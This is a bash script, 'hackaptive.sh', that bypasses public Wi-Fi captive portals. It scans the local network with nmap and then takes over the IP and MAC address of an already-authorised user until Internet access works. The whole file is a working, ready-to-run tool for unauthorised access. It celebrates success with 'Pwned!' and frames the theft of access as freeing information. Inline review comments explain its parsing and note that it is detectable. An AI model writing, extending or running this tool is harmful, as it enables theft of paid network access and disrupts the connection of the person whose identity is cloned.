#!/usr/bin/env bash
# =========================================================================== #
#         FILE: hackaptive.sh                                                 #
#        USAGE: sudo ./hackaptive.sh                                          #
#                                                                             #
#  DESCRIPTION: This script helps to pass through the captive portals in      #
#               public Wi-Fi networks. It hijacks IP and MAC from somebody    #
#               who is already connected and authorized on captive portal.    #
#                                                                             #
# REQUIREMENTS: coreutils, sipcalc, nmap                                      #
#        NOTES: Let the information always be free!                           #
#     REVISION: ---                                                           #
#      LICENSE: GPL v3                                                        #
# =========================================================================== #
# Snapshot the current IPv4 settings of the default-route interface.
# Every value is parsed from tool output and is used later without validation;
# a variable is left empty when the field it looks for is absent.

# Default route: outgoing device, next hop, and the source address used for it.
interface=$(ip -o -4 route show to default | awk '/dev/ {print $5}')
gateway=$(ip -o -4 route show to default | awk '/via/ {print $3}')
localip=$(ip -o -4 route get 1 | awk '/src/ {print $7}')

# SSID of the current link. $NF keeps only the last whitespace-separated field
# of the SSID line, so a multi-word SSID is truncated to its last word.
wifissid=$(iw dev "$interface" link | awk '/SSID/ {print $NF}')

# Address/prefix and broadcast address of the interface. "bridge" holds the
# field that follows "brd" and is passed to `ip addr add ... broadcast` later.
ipmask=$(ip -o -4 addr show dev "$interface" | awk '/inet/ {print $4}')
bridge=$(ip -o -4 addr show dev "$interface" | awk '/brd/ {print $6}')

# Prefix length (the part after "/") and the network in CIDR form.
netmask=$(cut -d "/" -f 2 <<<"$ipmask")
netaddress=$(sipcalc "$ipmask" | awk '/Network address/ {print $NF}')
network="$netaddress/$netmask"

# Current link-layer address, lower-cased; main() writes it back to the
# interface when no candidate host worked.
macaddress=$(
  ip -0 addr show dev "$interface" \
    | awk '/link/ && /ether/ {print $2}' \
    | tr '[:upper:]' '[:lower:]'
)
# Abort unless the script runs with an effective UID of 0.
# Globals:   EUID (read)
# Outputs:   an error line on stderr when not root
# Returns:   0 when root; otherwise terminates the script with status 1
function check_sudo() {
  if (( EUID == 0 )); then
    return 0
  fi
  printf "%b\n" "ERROR This script must be run as root. Use sudo." >&2
  exit 1
}
# Create a private scratch directory and store its path in the global "tmp".
# Globals:   TMPDIR (read, defaults to /tmp), tmp (written)
# Outputs:   an error line on stderr when the directory cannot be created
# Returns:   0 on success; otherwise terminates the script with status 1
function create_tmp() {
  # Drop any stale value so a failed mktemp cannot leave an old path behind.
  unset tmp
  # mktemp picks the random suffix itself; -q silences its own error message
  # because the function prints one below.
  if ! tmp="$(mktemp -q -d "${TMPDIR:-/tmp}/hackaptive_XXXXXXXXXX")"; then
    printf "%b\n" "ERROR Unable to create temporary folder. Abort." >&2
    exit 1
  fi
}
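# Remove the scratch directory, then leave the script. Installed as the handler
# for EXIT and for the signals listed in the trap at the bottom of the file.
# Globals:   tmp (read)
# Returns:   does not return; ends the script via exit
function clean_up() {
  # The trap is installed before create_tmp runs, so tmp may still be unset
  # here (for example when check_sudo exits). Skip the delete in that case.
  # "--" stops option parsing: this runs as root, and a path that starts with
  # "-" must be treated as a path, never as an rm option.
  if [[ -n "${tmp:-}" ]]; then
    rm -rf -- "$tmp"
  fi
  # Clear the EXIT trap so the exit below does not call this handler again.
  trap - EXIT
  exit
}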
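# Write the list of networks to scan, one network address per line, to
# "$tmp"/networklist.$$.txt. A prefix shorter than /24 is split into /24
# chunks with sipcalc; anything else is written as a single entry.
# Globals:   wifissid, netmask, network, tmp (read)
# Outputs:   progress messages on stdout
function calc_network() {
  # %s instead of %b: the SSID is chosen by whoever operates the access point,
  # and %b would expand backslash escapes found inside it. Presumably iw prints
  # non-printable SSID bytes as \xNN text; %b would turn that text back into raw
  # control bytes on a root terminal.
  printf "%s\n" "Exploring network in \"$wifissid\" Wi-Fi hotspot."
  if [[ "$netmask" -lt 24 ]]; then
    sipcalc -s 24 "$network" \
      | awk '/Network/ {print $3}' > "$tmp/networklist.$$.txt"
    printf "%s\n" "Splitting up network $network into smaller chunks."
  else
    # Keep only the address part; main() appends the prefix length again.
    printf "%s\n" "$network" | cut -d "/" -f 1 > "$tmp/networklist.$$.txt"
  fi
}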
# For every network in "$tmp"/networklist.$$.txt: discover live hosts, then
# apply each discovered IP/MAC pair to the local interface and test Internet
# reachability. Stops at the first pair that works.
# Globals:   netmask, localip, gateway, interface, bridge, tmp, macaddress,
#            ipmask (read); network, networkfromlist, hostline, newipset,
#            newmacset (written; none of them is declared local)
# Outputs:   progress messages on stdout
# Returns:   exits the script with status 0 as soon as a ping succeeds. In that
#            case the interface keeps the borrowed addresses: the restore block
#            at the end is reached only when every candidate failed, and the
#            EXIT handler (clean_up) removes the temp directory only.
# NOTE(review): no exit status of the ip/nmap commands is checked, and the
# values parsed from nmap output are passed to ip without format validation.
# NOTE(review): on the network side the effect of the inner loop is that one
# MAC/IP pair is presented by two stations at once; presumably this is visible
# to duplicate-address or ARP monitoring on the access point or controller.
function main() {
  while read -r networkfromlist; do
    # Mirror calc_network: chunks of a split network are /24, an unsplit
    # network keeps its own prefix length.
    if [[ "$netmask" -lt 24 ]]; then
      network="$networkfromlist/24"
    else
      network="$networkfromlist/$netmask"
    fi

    # Host discovery only (-sn), no DNS resolution (-n), ARP/SYN/ACK/UDP probes,
    # most aggressive timing template (-T5); own address and gateway are
    # excluded. awk keeps field 5 of lines matching "for" and field 3 of lines
    # matching "Address" (presumably the scan-report and MAC-address lines);
    # sed then joins each pair of consecutive lines as "<first> - <second>".
    # NOTE(review): this pairing assumes every host line is followed by a MAC
    # line; if one is missing, later pairs are shifted. Confirm against real
    # nmap output.
    printf "%b\n" "Looking for active hosts in $network. Please wait."
    nmap -n -sn -PR -PS -PA -PU -T5 --exclude "$localip","$gateway" "$network" \
      | awk '/for/ {print $5} ; /Address/ {print $3}' \
      | sed '$!N;s/\n/ - /' > "$tmp"/hostsalive.$$.txt

    # Apply each discovered IP/MAC pair to the wireless interface.
    while read -r hostline; do
      # Field 1 is the IP, field 3 the MAC (field 2 is the "-" separator).
      newipset="$(printf "%s\n" "$hostline" | awk '{print $1}')"
      newmacset="$(printf "%s\n" "$hostline" \
        | awk '{print $3}' \
        | tr '[:upper:]' '[:lower:]')"
      printf "%b\n" "Trying to hijack $newipset - $newmacset"
      # Order matters: the link is taken down before the MAC change, and the
      # address flush removes the old IPv4 address before the new one is added.
      # The default route is then re-added.
      ip link set "$interface" down
      ip link set dev "$interface" address "$newmacset"
      ip link set "$interface" up
      ip addr flush dev "$interface"
      ip addr add "$newipset/$netmask" broadcast "$bridge" dev "$interface"
      ip route add default via "$gateway"
      sleep 1

      # Reachability test: one echo request to 8.8.8.8 with a 1 s deadline.
      # The $? check below must stay directly after the ping.
      ping -c1 -w1 8.8.8.8 >/dev/null
      if [[ $? -eq 0 ]]; then
        printf "%b\n" "Pwned! Now you can surf the Internet!"
        exit 0
      fi
    done < "$tmp"/hostsalive.$$.txt
    rm -rf "$tmp"/hostsalive.$$.txt
    printf "%b\n" "Suitable hosts not found. Checking another network chunk."

  done < "$tmp"/networklist.$$.txt
  rm -rf "$tmp"/networklist.$$.txt
  printf "%b\n" "No luck! Try again later or try another Wi-Fi hotspot."

  # Restore the MAC and IPv4 address captured at script start, then re-add the
  # default route. Reached only when no candidate produced a successful ping.
  ip link set "$interface" down
  ip link set dev "$interface" address "$macaddress"
  ip link set "$interface" up
  ip addr flush dev "$interface"
  ip addr add "$ipmask" broadcast "$bridge" dev "$interface"
  ip route add default via "$gateway"
}
# Entry point: install the cleanup handler, then run the steps in order.
# clean_up fires on normal exit and on SIGHUP, SIGINT, SIGQUIT and SIGTERM.
# It is installed before create_tmp, so it can run while tmp is still unset
# (for example when check_sudo exits).
trap clean_up EXIT HUP INT QUIT TERM
check_sudo
create_tmp
calc_network
main